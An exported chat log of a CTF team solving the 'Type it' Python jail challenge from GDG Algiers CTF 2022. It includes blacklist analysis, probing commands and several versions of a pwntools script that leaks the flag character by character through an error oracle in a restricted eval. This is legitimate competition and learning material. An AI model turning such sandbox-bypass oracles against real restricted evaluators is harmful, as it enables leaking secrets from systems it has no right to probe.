Project Sekai - ✅-jail-type-it

Project Sekai

🔒 GDG Algiers CTF 2022 / ✅-jail-type-it

Type it - 500 points

Category: Jail Description: > Show me what can you type to read me Author : Raouf/0x13A0F Files:

https://ctf.gdgalgiers.com/files/8ecaea2e79d265a599ee876d5088f913/chal.py?token=eyJ1c2VyX2lkIjo0MzksInRlYW1faWQiOjE3NSwiZmlsZV9pZCI6NzV9.Y0E8Rg.mbR0WP7Jht1EkTZWVqGgGvA2mKc

Tags: python, jail

Sutx pinned a message to this channel. 10/08/2022 2:00 AM

@crazyman ai wants to collaborate

02:05

@Violin wants to collaborate

hey @Violin

02:09

BLACKLIST = '"%&',-/_:;@\`{|}~*<=>[] \t\n\r'

02:09

i think it can run some function

02:09

print(eval(f"{func.__name__}({s})", {"__builtins__": {func.__name__: func}, "flag": FLAG})) (edited)

02:10

maybe we need to leak FLAG of it

02:10

read env?

hey, rn i'm on phone

@irogir wants to collaborate

is anyone able to connect to the remote instance?

i can do it

ok same now

type(type)

02:26

type(help)

02:27

type(locals) <class 'builtin_function_or_method'>

02:27

type(globals) <class 'builtin_function_or_method'>

02:28

type(help) <class '_sitebuiltins._Helper'>

02:28

type(str) <class 'type'>

02:29

okay and then can't baned . maybe it's useful

python .\chal.py
Input : type
type(type)
<class 'type'>

so it seems we only can do something with type.mro

02:49

or the flag itself

02:49

but we cant call functions which take multiple arguments

02:50

im looking into something like an error oracle

yeah type.mro can work

02:55

but dir(type.mro)

dir(type.mro)
['__call__', '__class__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__get__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__name__', '__ne__', '__new__', '__objclass__', '__qualname__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__text_signature__']

it seems all banned of _

yep

02:55

thats why the only option is flag ig

dir() ?

you found a way to gen strings?

no

02:56

i try chr

FLAG.capitalize()    FLAG.expandtabs(     FLAG.isalpha()       FLAG.isnumeric()     FLAG.ljust(          FLAG.removesuffix(   FLAG.rsplit(         FLAG.swapcase()      
FLAG.casefold()      FLAG.find(           FLAG.isascii()       FLAG.isprintable()   FLAG.lower()         FLAG.replace(        FLAG.rstrip(         FLAG.title()         
FLAG.center(         FLAG.format(         FLAG.isdecimal()     FLAG.isspace()       FLAG.lstrip(         FLAG.rfind(          FLAG.split(          FLAG.translate(      
FLAG.count(          FLAG.format_map(     FLAG.isdigit()       FLAG.istitle()       FLAG.maketrans(      FLAG.rindex(         FLAG.splitlines(     FLAG.upper()         
FLAG.encode(         FLAG.index(          FLAG.isidentifier()  FLAG.isupper()       FLAG.partition(      FLAG.rjust(          FLAG.startswith(     FLAG.zfill(          
FLAG.endswith(       FLAG.isalnum()       FLAG.islower()       FLAG.join(           FLAG.removeprefix(   FLAG.rpartition(     FLAG.strip(

it doesm't work

crazyman ai

i try chr

not in the builtins

yeah

irogir

FLAG.capitalize()    FLAG.expandtabs(     FLAG.isalpha()       FLAG.isnumeric()     FLAG.ljust(          FLAG.removesuffix(   FLAG.rsplit(         FLAG.swapcase()      
FLAG.casefold()      FLAG.find(           FLAG.isascii()       FLAG.isprintable()   FLAG.lower()         FLAG.replace(        FLAG.rstrip(         FLAG.title()         
FLAG.center(         FLAG.format(         FLAG.isdecimal()     FLAG.isspace()       FLAG.lstrip(         FLAG.rfind(          FLAG.split(          FLAG.translate(      
FLAG.count(          FLAG.format_map(     FLAG.isdigit()       FLAG.istitle()       FLAG.maketrans(      FLAG.rindex(         FLAG.splitlines(     FLAG.upper()         
FLAG.encode(         FLAG.index(          FLAG.isidentifier()  FLAG.isupper()       FLAG.partition(      FLAG.rjust(          FLAG.startswith(     FLAG.zfill(          
FLAG.endswith(       FLAG.isalnum()       FLAG.islower()       FLAG.join(           FLAG.removeprefix(   FLAG.rpartition(     FLAG.strip(

these are our options

maybe we can use find

02:57

one byte and on byte to leak flag

Image attachment

02:57

requires a string too

02:57

like most methods

02:59

hm

03:00

we can modify the flag (copy) and pass it as a argument to a function call

03:01

but we only know the type or whether an exception occured

that's a problem

03:07

XD

bruh weak python knowledge shows

03:07

running out of ideas cryy

cryy

03:07

already 1 solve

he's so fast

03:10

maybe he will know some interesting trick

so maybe we need to have a look at type again

03:13

it will be there for a reason

now it's 3 solve

03:15

omg

hm

03:17

type.mro(type(1))
[<class 'int'>, <class 'object'>]

03:19

dir(type.mro(type(FLAG)))
['__add__', '__class__', '__class_getitem__', '__contains__', '__delattr__', '__delitem__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__iadd__', '__imul__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__reversed__', '__rmul__', '__setattr__', '__setitem__', '__sizeof__', '__str__', '__subclasshook__', 'append', 'clear', 'copy', 'count', 'extend', 'index', 'insert', 'pop', 'remove', 'reverse', 'sort']

crazyman@ubuntu:~/Desktop$ nc -v jail.chal.ctf.gdgalgiers.com 1302
Connection to jail.chal.ctf.gdgalgiers.com 1302 port [tcp/*] succeeded!
Input : type.mro(type(1))
<class 'list'>

03:20

crazyman@ubuntu:~/Desktop$ nc -v jail.chal.ctf.gdgalgiers.com 1302
Connection to jail.chal.ctf.gdgalgiers.com 1302 port [tcp/*] succeeded!
Input : type.mro(type(FLAG)) 
Error

lowercase flag

03:20

why is it a list remote tho

what about your python verison?

3.10.6

03:24

same output with 3.8.10

i'm using 3.8

03:27

oh i know

03:27

(running results are different)

03:27

python .\chal.py
Input : type.mro(type(1))
<class 'list'>

@TheBadGod wants to collaborate

for i in range(10): # flag length
  for guess in chars: # all possible chars
    payload = f"type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess})"

i guess something like this should work

eyes_blur

1

03:46

if we don't get an error the thing at position i has been guess

03:49

nope, wasn't it, got banned, so no char-by char leaking :(

what was your exact payload btw?

from pwn import *
from string import printable

chars = printable.encode()

FLAG = []
for i in range(100): # FLAG length
    for guess in chars: # all possible chars
        payload = f"type(type(FLAG).mro())(type(type(FLAG).mro())(FLAG).pop({i}).encode()).remove({guess})"
        
        r = remote("jail.chal.ctf.gdgalgiers.com", 1302)
        r.sendlineafter(b"Input", payload.encode())
        output = r.recvall()

        if b"Error" not in output:
            FLAG.append(guess)
            print("new char: ", bytes(FLAG))
            break

so the problem is at guess

03:53

if we had a way to generate arbitrary strings, this approach should work

no? guess is an int

03:55

from pwn import *
from string import printable

chars = printable.encode()

flag = []
for i in range(100): # flag length
    for guess in chars: # all possible chars
        print("guess: ", bytes(flag))
        payload = f"type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess})"
        
        #r = remote("jail.chal.ctf.gdgalgiers.com", 1302)
        r = process(["python", "./chal.py"])
        r.sendlineafter(b"Input", payload.encode())
        output = r.recvall()

        if b"Error" not in output:
            flag.append(guess)
            print("new char: ", bytes(flag))
            break

it works locally (in the other version i changed flag to FLAG, which was wrong)

it likes sidechannel?

03:56

leak one byte by one byte?

yes, but it's unintended and i get "banned" after leaking one char

03:58

from pwn import *
from string import printable
from time import sleep

chars = printable.encode()
flag = list(b"CyberErudites{wh")

for i in range(len(flag), 100): # flag length
    for guess in chars: # all possible chars
        print("guess: ", bytes(flag), chr(guess))
        payload = f"type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess})"
        
        r = remote("jail.chal.ctf.gdgalgiers.com", 1302)
        #r = process(["python", "./chal.py"])
        r.sendlineafter(b"Input", payload.encode())
        output = r.recvall()
        sleep(1)

        if b"Error" not in output:
            flag.append(guess)
            print("new char: ", bytes(flag))
            break

letting this run for the moment, seems to be working

May need to repeat the link

nah just needed to sleep for a bit i think

ohhh

04:00

i see

04:01

i think we need time on it

04:01

because it can worked i think

yes i got 6 chars already

cool!!!

04:02

so it's not an jail

04:02

it's sidechannel attack!

04:02

misc!

idk, maybe this is unintended, but hey it's working: CyberErudites{wh0_N3E

really cool

04:03

thanks God

04:03

!

crazyman ai

it's sidechannel attack!

why sidechannel?

TheBadGod

idk, maybe this is unintended, but hey it's working: CyberErudites{wh0_N3E

gj!

irogir

why sidechannel?

because it leak byte one by one

04:03

This is in line with the idea of side channel

04:04

or it's a blind injection

TheBadGod

used /ctf solve

✅ Challenge solved.

CyberErudites{wh0_N3Ed$_bR4CkeTS}

so n3ed$ BRACKETS?

04:13

what's is it

who needs brackets

04:14

i guess that's just the flag because [] are prohibited

yeah

Exported 116 message(s)